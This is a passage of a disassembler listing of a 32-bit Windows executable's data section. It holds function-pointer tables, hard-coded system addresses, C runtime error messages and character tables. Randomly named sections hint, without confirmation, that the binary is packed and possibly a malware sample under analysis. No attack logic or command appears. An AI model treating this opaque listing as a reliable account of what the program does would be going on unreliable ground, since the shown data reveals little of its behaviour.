off_41D05C	dd offset sub_450EF7	; DATA XREF: sub_419A09+8Br
					; hvvrg7ie:loc_44553Fw	...
dword_41D060	dd 77E7A099h		; DATA XREF: sub_409E64+99r
					; sub_40B203+2Ar ...
off_41D064	dd offset sub_451CF6	; DATA XREF: sub_419590+19r
					; hvvrg7ie:0044225Ew ...
dword_41D068	dd 77E7C657h		; DATA XREF: sub_4044D2-192r
					; sub_419641+24r ...
dword_41D06C	dd 77E7A837h		; DATA XREF: sub_40E422+234r
					; sub_4117DB+13r ...
off_41D070	dd offset sub_447E98	; DATA XREF: sub_418D42+31Er
					; hvvrg7ie:0044396Bw ...
off_41D074	dd offset sub_44397F	; DATA XREF: sub_40D06E+40r
					; sub_410B0B+2Dr ...
off_41D078	dd offset sub_43A0BE	; DATA XREF: sub_40A15D+17Fr
					; sub_40A15D+2A3r ...
off_41D07C	dd offset sub_447DD4	; DATA XREF: sub_414884+5Er
					; sub_41AFA7+6B5r ...
off_41D080	dd offset sub_4485A2	; DATA XREF: sub_41C28D+1B7r
					; hvvrg7ie:00450442w ...
off_41D084	dd offset sub_450456	; DATA XREF: sub_41C28D+311r
					; sub_4471CA:loc_43BE90w ...
dword_41D088	dd 77E79D8Ch		; DATA XREF: sub_409E64+194r
					; sub_40D20A+212r ...
off_41D08C	dd offset sub_44C20F	; DATA XREF: sub_4031FD+AAr
					; sub_404A3E+B9r ...
off_41D090	dd offset sub_45493B	; DATA XREF: sub_414884+1Cr
					; sub_41BB83+161r ...
off_41D094	dd offset sub_4414F6	; DATA XREF: sub_4147FC+8r
					; hvvrg7ie:00441136r ...
off_41D098	dd offset sub_452E0B	; DATA XREF: sub_40207A+B3r
					; hvvrg7ie:0043BA17r ...
off_41D09C	dd offset sub_451D60	; DATA XREF: sub_41AFA7+627r
					; hvvrg7ie:0043FA3Fr ...
dword_41D0A0	dd 77E77CCEh		; DATA XREF: sub_40A15D+3E7r
					; sub_40C307:loc_40C3B4r ...
off_41D0A4	dd offset sub_44712B	; DATA XREF: sub_410957+14Cr
					; sub_44712B+5r
off_41D0A8	dd offset sub_451669	; DATA XREF: sub_41088C+45r
					; hvvrg7ie:004501D2r ...
off_41D0AC	dd offset sub_4527A1	; DATA XREF: sub_41088C+78r
					; hvvrg7ie:0043D63Er ...
off_41D0B0	dd offset sub_44C2EA	; DATA XREF: sub_41088C+9Br
					; hvvrg7ie:0043E797w ...
off_41D0B4	dd offset sub_446FC5	; DATA XREF: sub_40F3FF+8Cr
					; hvvrg7ie:004511CAr ...
off_41D0B8	dd offset sub_45438B	; DATA XREF: sub_40F02F:loc_40F083r
					; sub_40F0AC:loc_40F104r ...
dword_41D0BC	dd 77E79824h		; DATA XREF: sub_419DDC+39r
					; sub_446428+5w ...
dword_41D0C0	dd 77E7C4B7h		; DATA XREF: sub_419DDC+50r
					; sub_44809F-37A0w ...
dword_41D0C4	dd 77E79E4Bh		; DATA XREF: sub_419DDC+6Fr
					; hvvrg7ie:0043B032w ...
dword_41D0C8	dd 77E79C90h		; DATA XREF: sub_4031FD+D9r
					; sub_404A3E+F5r ...
off_41D0CC	dd offset sub_4475D7	; DATA XREF: sub_41A645+20r
					; sub_41C28D+293r ...
off_41D0D0	dd offset sub_4518F7	; DATA XREF: sub_41A138+3Br
					; sub_440964+5w ...
off_41D0D4	dd offset sub_4581FB	; DATA XREF: sub_41A19C+3Br
					; sub_44479C+5r ...
dword_41D0D8	dd 77E77963h		; DATA XREF: sub_408DFD+4Br
					; sub_40E422+29Cr ...
dword_41D0DC	dd 77E77CC4h		; DATA XREF: sub_4056CA+60r
					; sub_405886+169r ...
dword_41D0E0	dd 77E79F93h		; DATA XREF: sub_4054D7+39r
					; sub_405543+39r ...
off_41D0E4	dd offset sub_43C290	; DATA XREF: sub_40F8D4+2Dr
					; sub_419E67+30r ...
off_41D0E8	dd offset sub_45AAC8	; DATA XREF: sub_4054D7+49r
					; sub_405543+49r ...
dword_41D0EC	dd 77F5157Dh		; DATA XREF: sub_4039C3+79r
					; sub_4056CA+2r ...
dword_41D0F0	dd 77E704FCh		; DATA XREF: sub_40207A+11Fr
					; sub_417776+D1r ...
off_41D0F4	dd offset sub_43D30A	; DATA XREF: sub_4031FD+E0r
					; sub_404A3E+FCr ...
off_41D0F8	dd offset sub_44955C	; DATA XREF: sub_407AEA+1Dr
					; sub_407B2A+25r ...
dword_41D0FC	dd 77E77CB7h		; DATA XREF: sub_4044D2-1B7r
					; sub_410957+67r ...
off_41D100	dd offset sub_446314	; DATA XREF: sub_41A690:loc_41A8F8r
					; hvvrg7ie:0043A5F6w ...
dword_41D104	dd 77E7751Ah		; DATA XREF: sub_40B439+51r
					; sub_417C7B+36r ...
dword_41D108	dd 77F51597h		; DATA XREF: sub_4039C3+68r
					; sub_4044D2-182r ...
off_41D10C	dd offset sub_457F40	; DATA XREF: sub_41B981+20r
					; sub_41BB83+43r ...
dword_41D110	dd 77F516F8h		; DATA XREF: sub_403AA0+Fr
					; sub_4044D2-1AEr ...
off_41D114	dd offset sub_450590	; DATA XREF: sub_40D20A+11Dr
					; hvvrg7ie:0044D41Dr
off_41D118	dd offset sub_44940B	; DATA XREF: sub_40D20A:loc_40D343r
					; sub_44940B+5r
off_41D11C	dd offset sub_44777D	; DATA XREF: sub_40CEB4+4r
					; sub_43D809-3A21w ...
dword_41D120	dd 77E7C866h		; DATA XREF: sub_40C6EC+2Dr
					; sub_40C6EC+11Cr ...
off_41D124	dd offset sub_440B13	; DATA XREF: sub_40C6EC+191r
					; sub_456F9F-C2EFw ...
dword_41D128	dd 77E781F9h		; DATA XREF: sub_40C307+30r
					; sub_40C307+144r ...
off_41D12C	dd offset sub_445B31	; DATA XREF: sub_40C307+294r
					; sub_40C307+365r ...
dword_41D130	dd 77E77EE1h		; DATA XREF: sub_40B2BC+Br
					; hvvrg7ie:0043A946r
dword_41D134	dd 77E79924h		; DATA XREF: sub_40B2BC:loc_40B336r
					; sub_40C307+216r ...
dword_41D138	dd 77E7C9E1h		; DATA XREF: sub_40B2BC+CCr
					; sub_43C811+453w ...
off_41D13C	dd offset sub_43CC78	; DATA XREF: sub_40B2BC:loc_40B39Ar
					; sub_43CC78:loc_446B3Cr
off_41D140	dd offset sub_44D017	; DATA XREF: sub_40B2BC+10Fr
					; sub_40B2BC+126r ...
dword_41D144	dd 77E78406h		; DATA XREF: sub_408B90+12Br
					; sub_408B90+1C7r ...
dword_41D148	dd 77E79C3Dh		; DATA XREF: sub_408B90+1B5r
					; sub_409E64+169r ...
dword_41D14C	dd 77E7C931h		; DATA XREF: sub_408B90+21Fr
					; hvvrg7ie:0043A742w ...
off_41D150	dd offset sub_443038	; DATA XREF: sub_406214+27r
					; sub_40DE1D+134r ...
off_41D154	dd offset sub_45A901	; DATA XREF: sub_406214+77r
					; sub_4062C4+52r ...
off_41D158	dd offset sub_44412E	; DATA XREF: sub_405F00+22Fr
					; hvvrg7ie:00450DD7r
dword_41D15C	dd 77E7C726h		; DATA XREF: sub_405E33+11r
					; hvvrg7ie:004573B8r
off_41D160	dd offset sub_44476B	; DATA XREF: sub_405E33+47r
					; hvvrg7ie:00446D17r ...
dword_41D164	dd 77F7E21Fh		; DATA XREF: sub_405DA7+28r
					; sub_40850B+28r ...
dword_41D168	dd 77F7E300h		; DATA XREF: sub_405CCF+Dr
					; sub_40855D+28r ...
off_41D16C	dd offset sub_451958	; DATA XREF: sub_405C7A+1r
					; sub_40E383+62r ...
dword_41D170	dd 77F51587h		; DATA XREF: sub_4056CA+78r
					; sub_40CEC4+ABr ...
off_41D174	dd offset sub_4540F9	; DATA XREF: sub_4055D9+2Br
					; sub_405886+85r ...
dword_41D178	dd 77E79B39h		; DATA XREF: sub_4055AF+23r
					; sub_405886+58r ...
dword_41D17C	dd 77E7C5B4h		; DATA XREF: sub_4055A6r
					; sub_405886:loc_405925r ...
dword_41D180	dd 77E78B61h		; DATA XREF: sub_4054D7+7r
					; sub_405543+7r ...
off_41D184	dd offset sub_448EC1	; DATA XREF: sub_404DF4+27r
					; sub_43D0B7+4w ...
dword_41D188	dd 77E7A13Fh		; DATA XREF: sub_404DF4+4Ar
					; hvvrg7ie:00439F2Bw ...
dword_41D18C	dd 77E778C5h		; DATA XREF: sub_404D50+59r
					; sub_405019+76r ...
dword_41D190	dd 77F522F2h		; DATA XREF: sub_402E05+82r
					; hvvrg7ie:0043CA5Cw ...
dword_41D194	dd 77E80656h		; DATA XREF: sub_402EA8r
					; sub_40B439+41r ...
off_41D198	dd offset sub_445DC4	; DATA XREF: sub_4031FD+BEr
					; sub_404A3E+D9r ...
dword_41D19C	dd 77E7C9E7h		; DATA XREF: sub_4031FD+B4r
					; sub_404A3E+CEr ...
off_41D1A0	dd offset sub_44B3F1	; DATA XREF: sub_403900+9r
					; sub_40B439+35r
off_41D1A4	dd offset sub_451E6D	; DATA XREF: sub_4044D2:loc_4043FFr
off_41D1A8	dd offset sub_4495B9	; DATA XREF: sub_4044D2-1CCr
					; sub_408B90+15r
off_41D1AC	dd offset sub_447E56	; DATA XREF: sub_40456B+40r
					; sub_40FBF7+222r ...
off_41D1B0	dd offset sub_44AB23	; DATA XREF: sub_413D26r
					; sub_44AB23:loc_440894r ...
dword_41D1B4	dd 77E7849Fh		; DATA XREF: sub_404BC6+24r
					; sub_404E6E+56r ...
dword_41D1B8	dd 77E777EFh		; DATA XREF: sub_404D50+84r
					; sub_405019+95r ...
		align 10h
dword_41D1C0	dd 71B2ACCBh		; DATA XREF: sub_402A02r
		align 8
dword_41D1C8	dd 1F7CD927h		; DATA XREF: sub_4029F6r
dword_41D1CC	dd 1F7CB8F8h		; DATA XREF: sub_4029F0r
dword_41D1D0	dd 1F7CD214h		; DATA XREF: sub_4029EAr
dword_41D1D4	dd 1F7D886Ah		; DATA XREF: sub_4029E4r
dword_41D1D8	dd 1F7BA3A9h		; DATA XREF: sub_4029DEr
		align 10h
dword_41D1E0	dd 77428B97h		; DATA XREF: sub_4198AD+148r
					; sub_41BED6+1E3r
		align 8
off_41D1E8	dd offset sub_444516	; DATA XREF: sub_417C7B+30r
					; hvvrg7ie:004390A8r ...
off_41D1EC	dd offset sub_443AD7	; DATA XREF: sub_419430+67r
					; sub_44CEC8-A58Bw ...
off_41D1F0	dd offset sub_443E4B	; DATA XREF: sub_419430+Cr
					; sub_443E56-4C0Dw ...
off_41D1F4	dd offset sub_43F25D	; DATA XREF: sub_419430+B1r
					; sub_44C5D0:loc_439C14w ...
off_41D1F8	dd offset sub_439C28	; DATA XREF: sub_419430+94r
					; hvvrg7ie:0043E6BAw ...
off_41D1FC	dd offset loc_43F511	; DATA XREF: sub_4192DB+Dr
					; sub_4192DB+2623Br
off_41D200	dd offset sub_44CF13	; DATA XREF: sub_419430+BBr
					; sub_44CF13+5r ...
off_41D204	dd offset sub_45AEC9	; DATA XREF: sub_419430+A5r
					; sub_444B4D+Er ...
off_41D208	dd offset sub_447EBC	; DATA XREF: sub_419430+4Ar
					; sub_447EBC+5r ...
		align 10h
dword_41D210	dd 7620BD61h		; DATA XREF: sub_41BED6+EBr
dword_41D214	dd 76214750h		; DATA XREF: sub_41BED6+7Dr
dword_41D218	dd 7620AFB6h		; DATA XREF: sub_41BED6+39r
		align 10h
dword_41D220	dd 71AB3C22h		; DATA XREF: sub_413D2C+20r
					; sub_414446+C9r ...
dword_41D224	dd 71ABD755h		; DATA XREF: sub_40223C+48r
					; sub_418D42+4F9r
dword_41D228	dd 71AB1AF4h		; DATA XREF: sub_414337+B0r
					; sub_414337+F1r ...
dword_41D22C	dd 71AB60C9h		; DATA XREF: sub_41930F+FAr
dword_41D230	dd 71AB5DE2h		; DATA XREF: sub_4145BE+B7r
					; sub_41930F+10Cr
dword_41D234	dd 71AB868Dh		; DATA XREF: sub_4145BE+165r
					; sub_418B4D+1Ar
dword_41D238	dd 71AB157Eh		; DATA XREF: sub_4197B6+34r
dword_41D23C	dd 71AB3E5Dh		; DATA XREF: sub_413D2C+78r
					; sub_414446+DCr ...
dword_41D240	dd 71AB1836h		; DATA XREF: sub_41C28D:loc_41C72Ar
dword_41D244	dd 71AB2BBFh		; DATA XREF: sub_41881F+7Br
dword_41D248	dd 71AB1ED3h		; DATA XREF: sub_41B981+F7r
dword_41D24C	dd 71AB3F8Dh		; DATA XREF: sub_41BB83+58r
dword_41D250	dd 71AB1746h		; DATA XREF: sub_41B981+131r
					; sub_41B981+147r ...
dword_41D254	dd 71AB1890h		; DATA XREF: sub_413D2C+8Fr
					; sub_414337+78r ...
dword_41D258	dd 71AB1444h		; DATA XREF: sub_41B981+11Cr
					; sub_41BB83+12Cr
dword_41D25C	dd 71AB401Ch		; DATA XREF: sub_41AFA7+3Cr
					; sub_41AFA7+757r ...
dword_41D260	dd 71AB1B7Bh		; DATA XREF: sub_4029FCr
dword_41D264	dd 71AB12F8h		; DATA XREF: sub_40223C+37r
dword_41D268	dd 71AB155Ah		; DATA XREF: sub_413D2C+54r
dword_41D26C	dd 71AB5690h		; DATA XREF: sub_414337+14r
					; sub_414446+64r ...
dword_41D270	dd 71AB1746h		; DATA XREF: sub_413D2C+34r
					; sub_4145BE+81r ...
dword_41D274	dd 71AB41DAh		; DATA XREF: sub_41C28D+3D5r
dword_41D278	dd 71ABF628h		; DATA XREF: sub_418D42+4C9r
dword_41D27C	dd 71AB3ECEh		; DATA XREF: sub_4145BE+9Er
					; sub_41930F+D7r ...
dword_41D280	dd 71AB1A6Dh		; DATA XREF: sub_401FD7+11r
					; sub_413D2C+98r ...
		align 8
dword_41D288	dd 0			; DATA XREF: sub_407D29+49o
		dd offset loc_41CAEB
; ---------------------------------------------------------------------------
		or	bl, cl
		inc	ecx
		add	ds:410041CBh, ah
		retf
; ---------------------------------------------------------------------------
		inc	ecx
		add	[ebp-35h], bl
		inc	ecx
		add	[ecx-35h], bh
		inc	ecx
		add	[ebp-4EFFBE35h], dl
		retf
; ---------------------------------------------------------------------------
		inc	ecx
		add	ch, cl
		retf
; ---------------------------------------------------------------------------
		inc	ecx
		add	cl, ch
		retf
; ---------------------------------------------------------------------------
		dw 41h
		dd offset loc_41CC05
		dd offset loc_41CC21
		dd offset loc_41CC3D
		dd offset loc_41CC4B
		dd offset loc_41CC67
		dd offset loc_41CC83
dword_41D2CC	dd 0			; DATA XREF: sub_407D29+50o
dword_41D2D0	dd 0			; DATA XREF: sub_407D29+2Do
		dd offset sub_403176
		dd offset sub_4051B3
		dd offset sub_40843A
		dd offset sub_40ACDF
		dd offset sub_40FBEA
		dd offset sub_40B539
dword_41D2EC	dd 0			; DATA XREF: sub_407D29+28o
dword_41D2F0	dd 0			; DATA XREF: sub_407DBB+73o
		dd offset sub_4117FA
		dd offset sub_4084EB
dword_41D2FC	dd 0			; DATA XREF: sub_407DBB:loc_407E29o
dword_41D300	dd 0			; DATA XREF: sub_407DBB+83o
		dd offset sub_40B55A
dword_41D308	dd 2 dup(0)		; DATA XREF: sub_407DBB:loc_407E39o
dword_41D310	dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 4210ECh
					; DATA XREF: .data:00423000o
					; .data:00423004o ...
off_41D324	dd offset loc_401043	; DATA XREF: sub_401038o
					; .text:00401046o ...
		dd offset sub_4030A0
		dd offset dword_4210A0
off_41D330	dd offset loc_4010C5	; DATA XREF: sub_401065+20o
					; sub_40109A+Ao ...
		dd offset sub_4010B7
		dd offset dword_421050
off_41D33C	dd offset loc_4010EC	; DATA XREF: .text:loc_4010E1o
					; .text:004010EFo ...
		dd offset sub_4010B7
		dd offset dword_420F10
off_41D348	dd offset loc_402A18	; DATA XREF: sub_402A0Do
					; .text:00402A1Bo ...
		dd offset sub_4010B7
aStringTooLong	db 'string too long',0  ; DATA XREF: sub_402A3A+Co
aInvalidStringP	db 'invalid string position',0 ; DATA XREF: sub_402A79+Co
		dd offset dword_420F60
off_41D37C	dd offset loc_4030AD	; DATA XREF: sub_402FBB+Ao
					; sub_402FCC+9o ...
		dd offset sub_4030A0
aUnknownExcepti	db 'Unknown exception',0 ; DATA XREF: sub_4030A0+7o
		align 4
		dd offset dword_420F74
off_41D39C	dd offset loc_4033BB	; DATA XREF: sub_4033AD+1o
					; .data:off_423008o ...
oword_41D3A0	xmmword	3FF00000000000003FF0000000000000h ; DATA XREF: sub_404170+E3r
					; sub_404170+10Ar
oword_41D3B0	xmmword	4330000000000000433h ; DATA XREF: sub_404170+46r
oword_41D3C0	xmmword	0		; DATA XREF: sub_404170:loc_404271r
oword_41D3D0	xmmword	7FFh		; DATA XREF: sub_404170+5Fr
dbl_41D3E0	db 0, 0, 0, 0, 0, 0, 0,	80h ; DATA XREF: sub_404170:loc_40426Ar
dword_41D3E8	dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF:	sub_40456B+Eo
		dd 3, 19930520h, 2 dup(0)
off_41D408	dd offset dword_4270E0	; DATA XREF: sub_404A3E+D4o
		dd offset dword_427138
		dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
		dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
		dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
		dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
		dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
		dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
		dd 7C7B7A79h, 7F7E7Dh
		db 3Dh,	0
word_41D492	dw 0			; DATA XREF: sub_40AF33+1Bo
					; _1fieagrn:0041EB80o ...
aEncodepointer	db 'EncodePointer',0    ; DATA XREF: sub_4054D7+43o
					; sub_405616+2Eo
		align 4
aKernel32_dll	db 'KERNEL32.DLL',0     ; DATA XREF: sub_4054D7:loc_40550Bo
					; sub_405543:loc_405577o ...
		align 4
aDecodepointer	db 'DecodePointer',0    ; DATA XREF: sub_405543+43o
					; sub_405616+42o
		align 4
aFlsfree	db 'FlsFree',0          ; DATA XREF: sub_405886+44o
aFlssetvalue	db 'FlsSetValue',0      ; DATA XREF: sub_405886+37o
aFlsgetvalue	db 'FlsGetValue',0      ; DATA XREF: sub_405886+2Ao
dword_41D4E4	dd 41736C46h		; DATA XREF: sub_405886+22o
byte_41D4E8	db 6Ch			; DATA XREF: sub_406D87+177r
		db 6Ch,	6Fh, 63h
		align 10h
aNull:					; DATA XREF: .data:off_423928o
		unicode	0, <(null)>,0
		align 10h
aNull_0		db '(null)',0           ; DATA XREF: .data:off_423924o
		align 4
byte_41D508	db 6			; DATA XREF: sub_406D87:loc_406F10r
		db 2 dup(0), 6
		dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
		dd 50h,	38202800h, 8075850h, 30303700h,	75057h,	8202000h
		dd 0
		dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
		dd 8000008h, 7000800h, 8
aCorexitprocess	db 'CorExitProcess',0   ; DATA XREF: sub_407C31+Fo
		align 4
aMscoree_dll	db 'mscoree.dll',0      ; DATA XREF: sub_407C31o
aCcs		db 'ccs=',0             ; DATA XREF: sub_4085AF+1CCo
		align 4
aUtf8		db 'UTF-8',0            ; DATA XREF: sub_4085AF+1E0o
		align 10h
aUtf16le	db 'UTF-16LE',0         ; DATA XREF: sub_4085AF:loc_4087ACo
		align 4
aUnicode	db 'UNICODE',0          ; DATA XREF: sub_4085AF:loc_4087C9o
aRuntimeError	db 'runtime error ',0
		align 4
		db 0Dh,0Ah,0
		align 4
aTlossError	db 'TLOSS error',0Dh,0Ah,0
		align 4
aSingError	db 'SING error',0Dh,0Ah,0
		align 4
aDomainError	db 'DOMAIN error',0Dh,0Ah,0
		align 4
aR6034AnApplica	db 'R6034',0Dh,0Ah
		db 'An application has made an attempt to load the C runtime library '
		db 'incorrectly.',0Ah
		db 'Please contact the application',27h,'s support team for more informa'
		db 'tion.',0Dh,0Ah,0
		align 8
aR6033AttemptTo	db 'R6033',0Dh,0Ah
		db '- Attempt to use MSIL code from this assembly during native code '
		db 'initialization',0Ah
		db 'This indicates a bug in your application. It is most likely the r'
		db 'esult of calling an MSIL-compiled (/clr) function from a native c'
		db 'onstructor or from DllMain.',0Dh,0Ah,0
		align 10h
aR6032NotEnough	db 'R6032',0Dh,0Ah
		db '- not enough space for locale information',0Dh,0Ah,0
		align 8
aR6031AttemptTo	db 'R6031',0Dh,0Ah
		db '- Attempt to initialize the CRT more than once.',0Ah
		db 'This indicates a bug in your application.',0Dh,0Ah,0
		align 4
aR6030CrtNotIni	db 'R6030',0Dh,0Ah
		db '- CRT not initialized',0Dh,0Ah,0
		align 4
aR6028UnableToI	db 'R6028',0Dh,0Ah
		db '- unable to initialize heap',0Dh,0Ah,0
		align 4
aR6027NotEnough	db 'R6027',0Dh,0Ah
		db '- not enough space for lowio initialization',0Dh,0Ah,0
		align 4
aR6026NotEnough	db 'R6026',0Dh,0Ah
		db '- not enough space for stdio initialization',0Dh,0Ah,0
		align 4
aR6025PureVirtu	db 'R6025',0Dh,0Ah
		db '- pure virtual function call',0Dh,0Ah,0
		align 4
aR6024NotEnough	db 'R6024',0Dh,0Ah
		db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
		align 4
aR6019UnableToO	db 'R6019',0Dh,0Ah
		db '- unable to open console device',0Dh,0Ah,0
		align 10h
aR6018Unexpecte	db 'R6018',0Dh,0Ah
		db '- unexpected heap error',0Dh,0Ah,0
		align 4
aR6017Unexpecte	db 'R6017',0Dh,0Ah
		db '- unexpected multithread lock error',0Dh,0Ah,0
		align 4
aR6016NotEnough	db 'R6016',0Dh,0Ah
		db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio	db 0Dh,0Ah
		db 'This application has requested the Runtime to terminate it in an '
		db 'unusual way.',0Ah
		db 'Please contact the application',27h,'s support team for more informa'
		db 'tion.',0Dh,0Ah,0
		align 4
aR6009NotEnough	db 'R6009',0Dh,0Ah
		db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough	db 'R6008',0Dh,0Ah
		db '- not enough space for arguments',0Dh,0Ah,0
		align 10h
aR6002FloatingP	db 'R6002',0Dh,0Ah      ; DATA XREF: .data:off_423C04o
		db '- floating point not loaded',0Dh,0Ah,0
		align 4
aMicrosoftVisua	db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_409E64+157o
		align 10h
asc_41DB20	db 0Ah			; DATA XREF: sub_409E64:loc_409F74o
		db 0Ah,0
		align 4
a___		db '...',0              ; DATA XREF: sub_409E64+E8o
aProgramNameUnk	db '<program name unknown>',0 ; DATA XREF: sub_409E64+A3o
		align 10h
aRuntimeErrorPr	db 'Runtime Error!',0Ah ; DATA XREF: sub_409E64+5Bo
		db 0Ah
		db 'Program: ',0
		align 4
		dd 2 dup(0)
		dd 7FF00000h, 0
		dd 0FFF00000h, 0
		dd 7FE00000h, 0
		dd 200000h, 3 dup(0)
		dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h,	0FFC00000h
		dd 0
		dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h,	8DA24260h
		dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41DBC8	dd 6E6174h		; DATA XREF: sub_40AA2F:loc_40AC67o
dword_41DBCC	dd 736F63h		; DATA XREF: sub_40AA2F:loc_40AC5Eo
dword_41DBD0	dd 6E6973h		; DATA XREF: sub_40AA2F:loc_40AC55o
aModf		db 'modf',0             ; DATA XREF: sub_40AA2F:loc_40AC49o
		align 4
aFloor		db 'floor',0            ; DATA XREF: sub_40AA2F:loc_40AC3Do
		align 4
aCeil		db 'ceil',0             ; DATA XREF: sub_40AA2F:loc_40AC34o
		align 4
aAtan		db 'atan',0             ; DATA XREF: sub_40AA2F:loc_40AC2Bo
		align 4
aExp10		db 'exp10',0            ; DATA XREF: sub_40AA2F+1BFo
		align 10h
dbl_41DC00	dq 1.0			; DATA XREF: sub_40ACF3+6Dr
aAcos		db 'acos',0             ; DATA XREF: sub_40AA2F:loc_40ABB2o
		align 10h
aAsin		db 'asin',0             ; DATA XREF: sub_40AA2F:loc_40ABA9o
		align 4
aLog		db 'log',0              ; DATA XREF: sub_40AA2F:loc_40AB6Co
					; sub_40AA2F+149o ...
aLog10		db 'log10',0            ; DATA XREF: sub_40AA2F:loc_40AB45o
					; sub_40AA2F+131o ...
		align 4
aExp		db 'exp',0              ; DATA XREF: sub_40AA2F:loc_40AB0Co
					; sub_40AA2F+10Do ...
aPow		db 'pow',0              ; DATA XREF: sub_40AA2F:loc_40AAD7o
					; sub_40AA2F:loc_40AB84o ...
off_41DC2C	dd offset sub_40B771	; DATA XREF: sub_4069F0+F1r
					; sub_4069F0+FAo ...
		dd offset dword_420FBC
off_41DC34	dd offset loc_40B589	; DATA XREF: sub_40B57Eo
					; .text:0040B58Co ...
		dd offset sub_4030A0
dword_41DC3C	dd 20646162h, 65637865h, 6F697470h, 6Eh	; DATA XREF: sub_40BDB6+156o
dword_41DC4C	dd 41h dup(0)		; DATA XREF: sub_40C307+25o
					; sub_40C6EC+27o
asc_41DD50:				; DATA XREF: .data:off_423668o
					; .data:00423E70o
		unicode	0, <	     (((((		    H>
		dw 10h
		dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
		dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
		dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
		dd 100010h, 200010h, 40h dup(0)
dword_41DF50	dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
					; DATA XREF: .data:00423E74o
					; .data:00423590o
		dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
		dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
		dd 3 dup(100010h), 3 dup(1820182h), 0Ah	dup(1020102h)
		dd 2 dup(100010h), 10h dup(200020h), 480020h, 8	dup(100010h)
		dd 140010h, 100014h, 2 dup(100010h), 100014h, 2	dup(100010h)
		dd 1010010h, 0Bh dup(1010101h),	1010010h, 3 dup(1010101h)
		dd 0Ch dup(1020102h), 1020010h,	3 dup(1020102h), 1010102h
		dd 0
dword_41E158	dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
		dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h,	0A7A6A5A4h
		dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
		dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
		dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
		dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
		dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
		dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
		dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
		dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
		dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
		dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
		dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
		dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
		dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
		dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
		dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
		dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
		dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
		dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h,	8F8E8D8Ch
		dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
		dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
		dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
		dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
		dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
		dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
		dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
		dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
		dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
		dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
		dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
		dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
		dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
		dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h,	0A7A6A5A4h
